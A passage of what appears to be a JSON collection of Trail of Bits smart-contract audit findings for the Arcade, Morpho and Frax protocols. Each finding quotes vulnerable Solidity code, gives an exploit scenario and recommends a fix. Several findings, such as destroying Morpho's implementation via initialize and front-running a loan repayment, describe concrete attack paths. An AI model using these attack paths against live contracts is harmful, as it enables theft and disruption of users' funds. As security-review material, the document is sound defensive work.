PN_MintingRole(msg.sender); _mint(to, loanId); return loanId; } Figure 12.2: The mint function in arcade-protocol/contracts/PromissoryNote.sol The _safeMint function's built-in safety check ensures that the recipient contract has the necessary ERC721Receiver implementation, verifying the contract's ability to receive and manage ERC-721 tokens. function _safeMint( address to, uint256 tokenId, bytes memory _data ) internal virtual { _mint(to, tokenId); require( _checkOnERC721Received(address(0), to, tokenId, _data), \"ERC721: transfer to non ERC721Receiver implementer\" ); } Figure 12.3: The _safeMint function in openzeppelin-contracts/contracts/token/ERC721/ERC721.sol The _checkOnERC721Received method invokes the onERC721Received method on the receiving contract, expecting a return value containing the bytes4 selector of the onERC721Received method. A successful pass of this check implies that the contract is indeed capable of receiving and processing ERC-721 tokens.
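For reference, a minimal sketch (an illustration, not Arcade code) of a recipient contract that would pass this check by returning the expected selector:

import {IERC721Receiver} from \"@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol\";

contract VaultRecipient is IERC721Receiver {
    // Returning the onERC721Received selector signals ERC-721 support,
    // so _safeMint's _checkOnERC721Received call succeeds
    function onERC721Received(address, address, uint256, bytes calldata)
        external pure override returns (bytes4)
    {
        return IERC721Receiver.onERC721Received.selector;
    }
}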
The _safeMint function does allow for reentrancy through the calling of _checkOnERC721Received on the receiver of the token. However, based on the order of operations in the affected functions in Arcade (figures 12.1 and 12.2), this poses no risk. Exploit Scenario Alice initializes a new asset vault by invoking the initializeBundle function of the VaultFactory contract, passing in her smart contract wallet address as the to argument. She transfers her valuable CryptoPunks NFT, intended to be used for collateral, to the newly created asset vault. However, she later discovers that her smart contract wallet lacks support for ERC-721 tokens. As a result, both her asset vault token and the CryptoPunks NFT become irretrievable, stuck within her smart wallet contract due to the absence of a mechanism to handle ERC-721 tokens. Recommendations Short term, use the _safeMint function instead of _mint in the PromissoryNote and VaultFactory contracts. The _safeMint function includes vital checks that ensure the recipient is equipped to handle ERC-721 tokens, thus mitigating the risk that NFTs could become frozen. Long term, enhance the unit testing suite. These tests should encompass more negative paths and potential edge cases, which will help uncover any hidden vulnerabilities or bugs like this one. Additionally, it is critical to test user-provided inputs extensively, covering a broad spectrum of potential scenarios. This rigorous testing will contribute to building a more secure, robust, and reliable system.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "13. Borrowers cannot realize full loan value without risking default ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "To fully capitalize on their loans, borrowers need to retain their loaned assets and the owed interest for the entire term of their loans. However, if a borrower waits until the loan's maturity date to repay it, they become immediately vulnerable to liquidation of their collateral by the lender. As soon as the block.timestamp value exceeds the dueDate value, a lender can invoke the claim function to liquidate the borrower's collateral. // First check if the call is being made after the due date. uint256 dueDate = data.startDate + data.terms.durationSecs; if (dueDate >= block.timestamp) revert LC_NotExpired(dueDate); Figure 13.1: A snippet of the claim function in arcade-protocol/contracts/LoanCore.sol Owing to the inherent nature of the blockchain, achieving precise synchronization between the block.timestamp and the dueDate is practically impossible. Moreover, repaying a loan before the dueDate would result in a loss of some of the loan's inherent value because the protocol's interest assessment design does not refund any part of the interest for early repayment. In a scenario in which block.timestamp is greater than dueDate, a lender can preempt a borrower's loan repayment attempt, invoke the claim function, and liquidate the borrower's collateral. Frequently, collateral will be worth more than the loaned assets, giving lenders an incentive to do this. Given the protocol's interest assessment design, the Arcade team should implement a grace period following the maturity date where no additional interest is expected to be assessed beyond the period agreed to in the loan terms.
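A hedged sketch of such a buffer applied to the check in figure 13.1 (GRACE_PERIOD is a hypothetical constant; the team's actual remediation may differ):

uint256 dueDate = data.startDate + data.terms.durationSecs;
// Hypothetical: the lender may claim only after the due date plus a grace period
if (dueDate + GRACE_PERIOD >= block.timestamp) revert LC_NotExpired(dueDate);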
This buffer would give the borrower an opportunity to fully capitalize on the term of their loan without the risk of defaulting and losing their collateral. Exploit Scenario Alice, a borrower, takes out a loan from Eve using Arcade's NFT lending protocol. Alice deposits her rare CryptoPunk as collateral, which is more valuable than the assets loaned to her, so that her position is over-collateralized. Alice plans to hold on to the lent assets for the entire duration of the loan period in order to maximize her benefit-to-cost ratio. Eve, the lender, is monitoring the blockchain for the moment when the block.timestamp is greater than or equal to the dueDate so that she can call the claim function and liquidate Alice's CryptoPunk. As soon as the loan term is up, Alice submits a transaction to the repay function, and Eve front-runs that transaction with her own call to the claim function. As a result, Eve is able to liquidate Alice's CryptoPunk collateral. Recommendations Short term, introduce a grace period after the loan's maturity date during which the lender cannot invoke the claim function. This buffer would give the borrower sufficient time to repay the loan without the risk of immediate collateral liquidation. Long term, revise the protocol's interest assessment design to allow a portion of the interest to be refunded in cases of early repayment. This change could reduce the incentive for borrowers to delay repayment until the last possible moment. Additionally, provide better education for borrowers on how the lending protocol works, particularly around critical dates and actions, and improve communication channels for borrowers to raise concerns or seek clarification.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "14. itemPredicates encoded incorrectly according to EIP-712 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The itemPredicates parameter is not encoded correctly, so the signer cannot see the verifier address when signing. The verifier address receives each batch of listed assets to check them for correctness and existence, which is vital to ensuring the security and integrity of the lending transaction. According to EIP-712, structured data should be hashed in conjunction with its typeHash. The following is the hashStruct function as defined in EIP-712: hashStruct(s) = keccak256(typeHash ‖ encodeData(s)), where typeHash = keccak256(encodeType(typeOf(s))) In the protocol, the recoverItemsSignature function hashes an array of Predicate[] structs that are passed in as the itemPredicates argument. The function encodes and hashes the array without adding the Predicate typeHash to each member of the array. The hashed output of that operation is then included in the _ITEMS_TYPEHASH variable as a bytes32 type, referred to as itemsHash.
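For contrast, a hedged sketch of EIP-712-compliant encoding of this array, assuming a Predicate struct of the form (bytes data, address verifier) (the typeHash string and helper name are illustrative):

bytes32 constant PREDICATE_TYPEHASH = keccak256(\"Predicate(bytes data,address verifier)\");

function hashPredicates(LoanLibrary.Predicate[] memory items) internal pure returns (bytes32) {
    bytes32[] memory hashes = new bytes32[](items.length);
    for (uint256 i = 0; i < items.length; i++) {
        // Each struct is hashed with its own typeHash; dynamic bytes are hashed first
        hashes[i] = keccak256(abi.encode(PREDICATE_TYPEHASH, keccak256(items[i].data), items[i].verifier));
    }
    // The array value is the hash of the concatenated struct hashes
    return keccak256(abi.encodePacked(hashes));
}

The protocol's current code, shown in figure 14.1, instead hashes the raw array in a single step: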
(bytes32 sighash, address externalSigner) = recoverItemsSignature( loanTerms, sig, nonce, neededSide, keccak256(abi.encode(itemPredicates)) ); Figure 14.1: A snippet of the initializeLoanWithItems function in arcade-protocol/contracts/OriginationController.sol // solhint-disable max-line-length bytes32 private constant _ITEMS_TYPEHASH = keccak256( \"LoanTermsWithItems(uint32 durationSecs,uint32 deadline,uint160 proratedInterestRate,uint256 principal,address collateralAddress,bytes32 itemsHash,address payableCurrency,bytes32 affiliateCode,uint160 nonce,uint8 side)\" ); Figure 14.2: The _ITEMS_TYPEHASH variable in arcade-protocol/contracts/OriginationController.sol However, this method of encoding an array of structs is not consistent with the EIP-712 guidelines, which stipulate the following: The array values are encoded as the keccak256 hash of the concatenated encodeData of their contents (i.e., the encoding of SomeType[5] is identical to that of a struct containing five members of type SomeType). The struct values are encoded recursively as hashStruct(value). This is undefined for cyclical data. Therefore, the protocol should iterate over the itemPredicates array, encoding each Predicate instance separately with its respective typeHash. Exploit Scenario Alice creates a loan offering that takes CryptoPunks as collateral. She submits the loan terms to the Arcade protocol. Bob, a CryptoPunk holder, navigates the Arcade UI to accept Alice's loan terms. An EIP-712 signature request appears in MetaMask for Bob to sign. Bob cannot validate whether the message he is signing uses the CryptoPunk verifier contract because that information is not included in the hash. Recommendations Short term, adjust the encoding of itemPredicates to comply with EIP-712 standards. Have the code iterate through the itemPredicates array and encode each Predicate instance separately with its associated typeHash. Additionally, refactor the _ITEMS_TYPEHASH variable so that the Predicate typeHash definition is appended to it and replace the bytes32 itemsHash parameter with Predicate[] items. This revision will allow the signer to see the verifier address of the message they are signing, ensuring the validity of each batch of items, in addition to complying with the EIP-712 standard. Long term, strictly adhere to established Ethereum protocols such as EIP-712. These standards exist to ensure interoperability, security, and predictable behavior in the Ethereum ecosystem. Violating these norms can lead to unforeseen security vulnerabilities.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "15. The fee values can distort the incentives for the borrowers and lenders ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "Arcade V3 contains nine fee settings. Six of these fees are to be paid by the lender, two are to be paid by the borrower, and the remaining fee is to be paid by the borrower if they decide to mint a new vault for their collateral. Depending on the values of these settings, the incentives can change for both loan counterparties. For example, to create a new loan, both the borrower and lender have to pay origination fees, and eventually, the loan must be rolled over, repaid, or defaulted.
In the first case, both the new lender and borrower pay rollover fees; note that the original lender pays no fees at all for closing the loan. In the second case, the lender pays interest fees and principal fees on closing the loan. Finally, if the loan is defaulted, the lender pays a default fee to liquidate the collateral. The various fees paid based on the outcome of the loan can result in an interesting incentive game for investors in the protocol, depending on the actual values of the fee settings. If the lender rollover fee is cheaper than the origination fee, investors may be incentivized to roll over existing loans instead of creating new ones, benefiting the original lenders by saving them the closing fees, and harming the borrowers by indirectly raising the interest rates to compensate. Similarly, if the lender rollover fees are higher than the closing fees, lenders will be less incentivized to roll over loans. In summary, having such fine control over possible fee settings introduces hard-to-predict incentives scenarios that can scare users away or cause users who do not account for fees to inadvertently lose profits. Recommendations Short term, clearly inform borrowers and lenders of all of the existing fees and their current values at the moment a loan is opened, as well as the various possible outcomes, including the expected net profits if the loan is repaid, rolled over, defaulted, or redeemed. Long term, add interactive ways for users to calculate their expected profits, such as a loan simulator.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "1. Different zero-address errors thrown by single and batch NFT withdrawal functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The withdrawBatch function throws an error that is different from the single NFT withdrawal functions (withdrawERC721, withdrawERC1155). This could confuse users and other applications that interact with the Arcade contracts. The withdrawBatch function throws a custom error (AV_ZeroAddress) if the to parameter is set to the zero address. The single NFT withdrawal functions withdrawERC721 and withdrawERC1155 do not explicitly check the to parameter. All three of these functions internally call the _withdrawERC721 and _withdrawERC1155 functions, which also do not explicitly check the to parameter. The lack of such a check is not a problem: according to the ERC-721 and ERC-1155 standards, a transfer must revert if to is the zero address, so the single NFT withdrawal functions will revert on this condition. However, they will revert with the error message that is defined inside the actual NFT contract instead of the Arcade AV_ZeroAddress error, which is thrown when withdrawBatch reverts.
function withdrawBatch( address[] calldata tokens, uint256[] calldata tokenIds, TokenType[] calldata tokenTypes, address to ) external override onlyOwner onlyWithdrawEnabled { uint256 tokensLength = tokens.length; if (tokensLength > MAX_WITHDRAW_ITEMS) revert AV_TooManyItems(tokensLength); if (tokensLength != tokenIds.length) revert AV_LengthMismatch(\"tokenId\"); if (tokensLength != tokenTypes.length) revert AV_LengthMismatch(\"tokenType\"); /* line 203 */ if (to == address(0)) revert AV_ZeroAddress(); for (uint256 i = 0; i < tokensLength; i++) { /* line 206 */ if (tokens[i] == address(0)) revert AV_ZeroAddress(); Figure 1.1: A snippet of the withdrawBatch function in arcade-protocol/contracts/vault/AssetVault.sol Additionally, the CryptoPunks NFT contract does not follow the ERC-721 and ERC-1155 standards and contains no check that prevents funds from being transferred to the zero address (and the function is called transferPunk instead of the standard transfer). An explicit check to ensure that to is not the zero address inside the withdrawPunk function is therefore recommended. function transferPunk(address to, uint punkIndex) { if (!allPunksAssigned) throw; if (punkIndexToAddress[punkIndex] != msg.sender) throw; if (punkIndex >= 10000) throw; if (punksOfferedForSale[punkIndex].isForSale) { punkNoLongerForSale(punkIndex); } punkIndexToAddress[punkIndex] = to; balanceOf[msg.sender]--; balanceOf[to]++; Transfer(msg.sender, to, 1); PunkTransfer(msg.sender, to, punkIndex); /* Check for the case where there is a bid from the new owner and refund it. Any other bid can stay in place. */ Bid bid = punkBids[punkIndex]; if (bid.bidder == to) { /* Kill bid and refund value */ pendingWithdrawals[to] += bid.value; punkBids[punkIndex] = Bid(false, punkIndex, 0x0, 0); } } Figure 1.2: The transferPunk function in CryptoPunksMarket contract (Etherscan) Lastly, there is no string argument to the AV_ZeroAddress error to indicate which variable equaled the zero address and caused the revert, unlike the AV_LengthMismatch error. For example, in the batch function (figure 1.1), the AV_ZeroAddress could be thrown in line 203 or 206. Exploit Scenario Bob, a developer of a front-end blockchain application that interacts with the Arcade contracts, develops a page that interacts with an AssetVault contract. In his implementation, he catches specific errors that are thrown so that he can show an informative message to the user. Because the batch and withdrawal functions throw different errors when to is the zero address, he needs to write two versions of error handlers instead of just one. Recommendations Short term, add the zero address check with the custom error to the _withdrawERC721 and _withdrawERC1155 functions. This will cause the same custom error to be thrown for all of the single and batch NFT withdrawal functions. Also, add an explicit zero-address check inside the withdrawPunk function. Lastly, add a string argument to the AV_ZeroAddress custom error that is used to indicate the name of the variable that triggered the error (similar to the one in AV_LengthMismatch). Long term, ensure consistency in the errors thrown throughout the implementation. This will allow users and developers to understand errors that are thrown and will allow the Arcade team to test fewer errors.
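As a hedged sketch of the first recommendation, the check could live in the shared internal helper so that every withdrawal path reverts identically (the helper's transfer and event lines below are assumed for illustration, and the string argument reflects the last recommendation):

function _withdrawERC721(address token, uint256 tokenId, address to) internal {
    // Same custom error as withdrawBatch, with a string argument naming the variable
    if (to == address(0)) revert AV_ZeroAddress(\"to\");
    IERC721(token).safeTransferFrom(address(this), to, tokenId);
    emit WithdrawERC721(msg.sender, token, to, tokenId);
}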
", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "16.
Malicious borrowers can use forceRepay to grief lenders ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "A malicious borrower can grief a lender by calling the forceRepay function instead of the repay function; doing so would allow the borrower to pay less in gas fees and require the lender to perform a separate transaction to retrieve their funds (using the redeemNote function) and to pay a redeem fee. At any time after the loan is set, and before the lender claims the collateral (which the lender can do once the loan is past its due date), the borrower has to pay their full debt back in order to recover their assets. For doing so, there are two functions in RepaymentController: repay and forceRepay. The difference between them is that the latter transfers the tokens to the LoanCore contract instead of directly to the lender. It is meant to allow the borrower to pay their obligations when the lender cannot receive tokens for any reason. For the lender to get their tokens back in this scenario, they must call the redeemNote function in RepaymentController, which in turn calls LoanCore.redeemNote, which transfers the tokens to an address set by the lender in the call. Because the borrower is free to decide which function to call to repay their debt, they can arbitrarily decide to do so via forceRepay, obligating the lender to send a transaction (with its associated gas fees) to recover their tokens. Additionally, depending on the configuration of the protocol, it is possible that the lender has to pay an additional fee (LENDER_REDEEM_FEE) to get back their own tokens, cutting their profits with no chance to opt out. function redeemNote(uint256 loanId, address to) external override { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId); if (data.state != LoanLibrary.LoanState.Repaid) revert RC_InvalidState(data.state); address lender = lenderNote.ownerOf(loanId); if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender); uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / BASIS_POINTS_DENOMINATOR; loanCore.redeemNote(loanId, redeemFee, to); } Figure 16.1: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol Note that, from the perspective of the borrower, it is actually cheaper to call forceRepay than repay because of the gas saved by not transferring the tokens to the lender and not burning one of the promissory notes. Exploit Scenario Bob has to pay back his loan, and he decides to do so via forceRepay to save gas in the transaction. Lucy, the lender, wants her tokens back. She is now forced to call redeemNote to get them. In this transaction, she lost the gas fees that the borrower would have paid to send the tokens directly to her, and she has to pay an additional fee (LENDER_REDEEM_FEE), causing her to receive less value from the loan than she originally expected. Recommendations Short term, remove the incentive (the lower gas cost) for the borrower to call forceRepay instead of repay. Consider taking one of the following actions: Force the lender to always pull their funds using the redeemNote function. This can be achieved by removing the repay function and requiring the borrower to call forceRepay.
Remove the forceRepay function and modify the repay function so that it transfers the funds to the lender in a try/catch statement and creates a redeem note (which the lender can exchange for their funds using the redeemNote function) only if that transfer fails. Long term, when designing a smart contract protocol, always consider the incentives for each party to perform actions in the protocol, and avoid making an actor pay for the mistakes or maliciousness of others. By thoroughly documenting the incentives structure, flaws can be spotted and mitigated before the protocol goes live. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "1. Lack of two-step process for contract ownership changes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "The owner of the IncentivesVault contract and other Ownable Morpho contracts can be changed by calling the transferOwnership function. This function internally calls the _transferOwnership function, which immediately sets the contract's new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes. contract IncentivesVault is IIncentivesVault, Ownable { Figure 1.1: Inheritance of contracts/compound/IncentivesVault.sol function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), \"Ownable: new owner is the zero address\"); _transferOwnership(newOwner); } Figure 1.2: The transferOwnership function in @openzeppelin/contracts/access/Ownable.sol Exploit Scenario Bob, the IncentivesVault owner, invokes transferOwnership() to change the contract's owner but accidentally enters the wrong address. As a result, he permanently loses access to the contract. Recommendations Short term, for contract ownership transfers, implement a two-step process, in which the owner proposes a new address and the transfer is completed once the new address has executed a call to accept the role. Long term, identify and document all possible actions that can be taken by privileged accounts and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "2. Incomplete information provided in Withdrawn and Repaid events ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "The core operations in the PositionsManager contract emit events with parameters that provide information about the operations' actions. However, two events, Withdrawn and Repaid, do not provide complete information. For example, the withdrawLogic function, which performs withdrawals, takes a _supplier address (the user supplying the tokens) and _receiver address (the user receiving the tokens): /// @param _supplier The address of the supplier. /// @param _receiver The address of the user who will receive the tokens. /// @param _maxGasForMatching The maximum amount of gas to consume within a matching engine loop.
function withdrawLogic( address _poolTokenAddress, uint256 _amount, address _supplier, address _receiver, uint256 _maxGasForMatching ) external Figure 2.1: The function signature of PositionsManager's withdrawLogic function However, the corresponding event in _safeWithdrawLogic records only the msg.sender of the transaction, so the _supplier and _receiver involved in the transaction are unclear. Moreover, if a withdrawal is performed as part of a liquidation operation, three separate addresses may be involved (the _supplier, the _receiver, and the _user who triggered the liquidation), and those monitoring events will have to cross-reference multiple events to understand whose tokens moved where. /// @notice Emitted when a withdrawal happens. /// @param _user The address of the withdrawer. /// @param _poolTokenAddress The address of the market from where assets are withdrawn. /// @param _amount The amount of assets withdrawn (in underlying). /// @param _balanceOnPool The supply balance on pool after update. /// @param _balanceInP2P The supply balance in peer-to-peer after update. event Withdrawn( address indexed _user, Figure 2.2: The declaration of the Withdrawn event in PositionsManager emit Withdrawn( msg.sender, _poolTokenAddress, _amount, supplyBalanceInOf[_poolTokenAddress][msg.sender].onPool, supplyBalanceInOf[_poolTokenAddress][msg.sender].inP2P ); Figure 2.3: The emission of the Withdrawn event in the _safeWithdrawLogic function A similar issue is present in the _safeRepayLogic function's Repaid event. Recommendations Short term, add the relevant addresses to the Withdrawn and Repaid events. Long term, review all of the events emitted by the system to ensure that they emit sufficient information.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. Missing access control check in withdrawLogic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "The PositionsManager contract's withdrawLogic function does not perform any access control checks. In practice, this issue is not exploitable, as all interactions with this contract will be through delegatecalls with a hard-coded msg.sender sent from the main Morpho contract. However, if this code is ever reused or if the architecture of the system is ever modified, this guarantee may no longer hold, and users without the proper access may be able to withdraw funds. /// @dev Implements withdraw logic with security checks. /// @param _poolTokenAddress The address of the market the user wants to interact with. /// @param _amount The amount of token (in underlying). /// @param _supplier The address of the supplier. /// @param _receiver The address of the user who will receive the tokens. /// @param _maxGasForMatching The maximum amount of gas to consume within a matching engine loop. function withdrawLogic( address _poolTokenAddress, uint256 _amount, address _supplier, address _receiver, uint256 _maxGasForMatching ) external { Figure 3.1: The withdrawLogic function, which takes a supplier and whose comments note that it performs security checks Recommendations Short term, add a check to the withdrawLogic function to ensure that it withdraws funds only from the msg.sender. Long term, implement security checks consistently throughout the codebase.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "4.
Lack of zero address checks in setter functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. A mistake like this could initially go unnoticed because a delegatecall to an address without code will return success. /// @notice Sets the `positionsManager`. /// @param _positionsManager The new `positionsManager`. function setPositionsManager(IPositionsManager _positionsManager) external onlyOwner { positionsManager = _positionsManager; emit PositionsManagerSet(address(_positionsManager)); } Figure 4.1: An important address setter in MorphoGovernance Exploit Scenario Alice and Bob control a multisignature wallet that is the owner of a deployed Morpho contract. They decide to set _positionsManager to a newly upgraded contract but, while invoking setPositionsManager, they mistakenly omit the address. As a result, _positionsManager is set to the zero address, resulting in undefined behavior. Recommendations Short term, add zero-value checks to all important address setters to ensure that owners cannot accidentally set addresses to incorrect values, misconfiguring the system. Specifically, add zero-value checks to the setPositionsManager, setRewardsManager, setInterestRates, setTreasuryVault, and setIncentivesVault functions, as well as the _cETH and _cWeth parameters of the initialize function in the MorphoGovernance contract. Long term, incorporate Slither into a continuous integration pipeline, which will continuously warn developers when functions do not have checks for zero values.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "5. Risky use of toggle functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "The codebase uses a toggle function, togglePauseStatus, to pause and unpause a market. This function is error-prone because setting a pause status on a market depends on the market's current state. Multiple uncoordinated pauses could result in a failure to pause a market in the event of an incident. /// @notice Toggles the pause status on a specific market in case of emergency. /// @param _poolTokenAddress The address of the market to pause/unpause. function togglePauseStatus(address _poolTokenAddress) external onlyOwner isMarketCreated(_poolTokenAddress) { Types.MarketStatus storage marketStatus_ = marketStatus[_poolTokenAddress]; bool newPauseStatus = !marketStatus_.isPaused; marketStatus_.isPaused = newPauseStatus; emit PauseStatusChanged(_poolTokenAddress, newPauseStatus); } Figure 5.1: The togglePauseStatus method in MorphoGovernance This issue also applies to togglePartialPauseStatus, toggleP2P, and toggleCompRewardsActivation in MorphoGovernance and to togglePauseStatus in IncentivesVault. Exploit Scenario All signers of a 4-of-9 multisignature wallet that owns a Morpho contract notice an ongoing attack that is draining user funds from the protocol. Two groups of four signers hurry to independently call togglePauseStatus, resulting in a failure to pause the system and leading to the further loss of funds. Recommendations Short term, replace the toggle functions with ones that explicitly set the pause status to true or false.
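A hedged sketch of such an explicit setter, reusing the names from figure 5.1 (an illustration, not Morpho's code):

function setPauseStatus(address _poolTokenAddress, bool _isPaused) external onlyOwner isMarketCreated(_poolTokenAddress) {
    // Idempotent: repeated calls with the same argument leave the market in the intended state
    marketStatus[_poolTokenAddress].isPaused = _isPaused;
    emit PauseStatusChanged(_poolTokenAddress, _isPaused);
}

With this shape, two uncoordinated emergency calls to setPauseStatus(market, true) both leave the market paused.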
Long term, carefully review the incident response plan and ensure that it leaves as little room for mistakes as possible.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "6. Anyone can destroy Morpho's implementation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "An incorrect access control on the initialize function for Morpho's implementation contract allows anyone to destroy the contract. Morpho uses the delegatecall proxy pattern for upgradeability: abstract contract MorphoStorage is OwnableUpgradeable, ReentrancyGuardUpgradeable { Figure 6.1: contracts/compound/MorphoStorage.sol#L16 With this pattern, a proxy contract is deployed and executes a delegatecall to the implementation contract for certain operations. Users are expected to interact with the system through this proxy. However, anyone can also directly call Morpho's implementation contract. Despite the use of the proxy pattern, the implementation contract itself also has delegatecall capacities. For example, setReserveFactor calls the updateP2PIndexes function, which executes a delegatecall on a user-provided address: function setReserveFactor(address _poolTokenAddress, uint16 _newReserveFactor) external onlyOwner isMarketCreated(_poolTokenAddress) { if (_newReserveFactor > MAX_BASIS_POINTS) revert ExceedsMaxBasisPoints(); updateP2PIndexes(_poolTokenAddress); Figure 6.2: contracts/compound/MorphoGovernance.sol#L203-L209 function updateP2PIndexes(address _poolTokenAddress) public { address(interestRatesManager).functionDelegateCall( abi.encodeWithSelector( interestRatesManager.updateP2PIndexes.selector, _poolTokenAddress ) ); } Figure 6.3: contracts/compound/MorphoUtils.sol#L119-L126 These functions are protected by the onlyOwner modifier; however, the system's owner is set by the initialize function, which is callable by anyone: function initialize( IPositionsManager _positionsManager, IInterestRatesManager _interestRatesManager, IComptroller _comptroller, Types.MaxGasForMatching memory _defaultMaxGasForMatching, uint256 _dustThreshold, uint256 _maxSortedUsers, address _cEth, address _wEth ) external initializer { __ReentrancyGuard_init(); __Ownable_init(); Figure 6.4: contracts/compound/MorphoGovernance.sol#L114-L125 As a result, anyone can call Morpho.initialize to become the owner of the implementation and execute any delegatecall from the implementation, including to a contract containing a selfdestruct. Doing so will cause the proxy to point to a contract that has been destroyed. This issue is also present in PositionsManagerForAave. Exploit Scenario The system is deployed. Eve calls Morpho.initialize on the implementation and then calls setReserveFactor, triggering a delegatecall to an attacker-controlled contract that self-destructs. As a result, the system stops working. Recommendations Short term, add a constructor in MorphoStorage and PositionsManagerForAaveStorage that will set an is_implementation variable to true and check that this variable is false before executing any critical operation (such as initialize, delegatecall, and selfdestruct). By setting this variable in the constructor, it will be set only in the implementation and not in the proxy. Long term, carefully review the pitfalls of using the delegatecall proxy pattern. References Breaking Aave Upgradeability", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "7.
Lack of return value checks during token transfers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "In certain parts of the codebase, contracts that execute transfers of the Morpho token do not check the values returned from those transfers. The development of the Morpho token was not yet complete at the time of the audit, so we were unable to review the code specific to the Morpho token. Some tokens that are not ERC20 compliant return false instead of reverting, so failure to check such return values could result in undefined behavior, including the loss of funds. If the Morpho token adheres to ERC20 standards, then this issue may not pose a risk; however, due to the lack of return value checks, the possibility of undefined behavior cannot be eliminated. function transferMorphoTokensToDao(uint256 _amount) external onlyOwner { morphoToken.transfer(morphoDao, _amount); emit MorphoTokensTransferred(_amount); } Figure 7.1: The transferMorphoTokensToDao method in IncentivesVault Exploit Scenario The Morpho token code is completed and deployed alongside the other Morpho system components. It is implemented in such a way that it returns false instead of reverting when transfers fail, leading to undefined behavior. Recommendations Short term, consider using a safeTransfer library for all token transfers. Long term, review the token integration checklist and check all the components of the system to ensure that they interact with tokens safely.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Undetermined" + ] + }, + { + "title": "8. Risk of loss of precision in division operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", + "body": "A common pattern in the codebase is to divide a user's debt by the total supply of a token; a loss of precision in these division operations could occur, which means that the supply delta would not account for the entire matched delta amount. The impact of this potential loss of precision requires further investigation. For example, the borrowLogic method uses this pattern: toWithdraw += matchedDelta; remainingToBorrow -= matchedDelta; delta.p2pSupplyDelta -= matchedDelta.div(poolSupplyIndex); emit P2PSupplyDeltaUpdated(_poolTokenAddress, delta.p2pSupplyDelta); Figure 8.1: Part of the borrowLogic() method Here, if matchedDelta is not a multiple of poolSupplyIndex, the remainder would not be taken into account. In an extreme case, if matchedDelta is smaller than poolSupplyIndex, the result of the division operation would be zero. An attacker could exploit this loss of precision to extract small amounts of underlying tokens sitting in the Morpho contract. Exploit Scenario Bob transfers some Dai to the Morpho contract by mistake. Eve sees this transfer, deposits some collateral, and then borrows an amount of Dai from Morpho small enough that it does not affect Eve's debt. Eve withdraws her deposited collateral and walks out with Bob's Dai. Further investigation into this exploit scenario is required. Recommendations Short term, add checks to validate input data to prevent precision issues in division operations. Long term, review all the arithmetic that is vulnerable to rounding issues.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Undetermined" + ] + }, + { + "title": "1.
Testing is not routine ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The Frax Solidity repository does not have reproducible tests that can be run locally. Having reproducible tests is one of the best ways to ensure a codebase's functional correctness. This finding is based on the following events: We tried to carry out the instructions in the Frax Solidity README at commit 31dd816. We were unsuccessful. We reached out to Frax Finance for assistance. Frax Finance in turn pushed eight additional commits to the Frax Solidity repository (not counting merge commits). With these changes, we were able to run some of the tests, but not all of them. These events suggest that tests require substantial effort to run (as evidenced by the eight additional commits), and that they were not functional at the start of the assessment. Exploit Scenario Eve exploits a flaw in a Frax Solidity contract. The flaw would likely have been revealed through unit tests. Recommendations Short term, develop reproducible tests that can be run locally for all contracts. A comprehensive set of unit tests will help expose errors, protect against regressions, and provide a sort of documentation to users. Long term, incorporate unit testing into the CI process: Run the tests specific to contract X when a push or pull request affects contract X. Run all tests before deploying any new code, including updates to existing contracts. Automating the testing process will help ensure the tests are run regularly and consistently.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + 